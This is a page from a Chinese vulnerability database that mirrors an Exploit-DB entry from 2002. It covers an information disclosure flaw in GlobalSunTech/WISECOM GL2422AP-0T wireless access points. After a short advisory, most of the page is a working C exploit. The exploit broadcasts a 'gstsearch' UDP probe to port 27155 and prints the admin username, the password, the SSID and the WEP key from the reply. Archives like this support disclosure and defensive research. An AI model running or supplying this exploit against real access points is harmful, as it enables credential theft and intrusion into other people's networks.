GlobalSunTech Access Point GL2422AP-0T – Information Disclosure

GlobalSunTech Access Point GL2422AP-0T – Information Disclosure

漏洞ID 1053633 漏洞类型
发布时间 2002-11-04 更新时间 2002-11-04
图片[1]-GlobalSunTech Access Point GL2422AP-0T – Information Disclosure-安全小百科CVE编号 N/A
图片[2]-GlobalSunTech Access Point GL2422AP-0T – Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21983
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6100/info

An information disclosure vulnerability has been discovered in GlobalSunTech access points.

It has been reported that a remote attacker is able to retrieve sensitive information from vulnerable access points, including AP login credentials.

Information gained by exploiting this vulnerability may allow an attacker to launch further attacks against the target network.

It should be noted that this vulnerability was reported for a WISECOM GL2422AP-0T access point. Devices that use Global Sun Technology access points may be affected by this issue.

It has been determined that D-Link DI-614+ and SMC Barricade 7004AWBR access points are not affected by this issue.

It has been reported that Linksys WAP11-V2.2 is prone to this issue, but to a lesser extent. 

/*

 Orig version by Tom Knienieder <[email protected]>
 Patched by H�kan Carlsson <[email protected]> for DWL-900AP+ v2.2

*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

typedef struct {
        char type[32] /* [28] */;
	char scr1 [4];
        char name[32];
        char user[16];
        char pass[16];
	char scr2 [408];
	char ssid [32];
	char scr3 [61];
	unsigned char wkey [13];
}
__attribute__ ((packed)) answer;

int main()
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer* ans = (answer *)rcvbuffer;
        int sd, ret, val;

        sin.sin_family          = AF_INET;
        sin.sin_addr.s_addr     = inet_addr("255.255.255.255");
        sin.sin_port            = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0)
                perror("socket");

        val = 1;
        ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
        if (ret < 0)
        {
                perror("setsockopt");
                exit(1);
        }

        ret = sendto(sd, "gstsearch", 9, 0, (const struct sockaddr *)&sin,
			sizeof(struct sockaddr));
        if (ret < 0)
        {
                perror("sendto");
                exit(1);
        }

        ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));

        printf("Type            : %.32sn",ans->type);
        printf("Announced Name  : %sn",ans->name);
        printf("Admin Username  : %sn",ans->user);
        printf("Admin Password  : %sn",ans->pass);
        printf("SSID            : %sn",ans->ssid);
        printf("Wep KEY         : ");
	{
		int i = 0;
		for (i=0; i<sizeof(ans->wkey); i++) {
			printf ("%02x ", ans->wkey[i]);
		}
		printf ("n");
	}

        return 0;
}

相关推荐: Perdition Vanessa_Logger Format String Vulnerability

Perdition Vanessa_Logger Format String Vulnerability 漏洞ID 1102661 漏洞类型 Input Validation Error 发布时间 2001-12-25 更新时间 2001-12-25 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享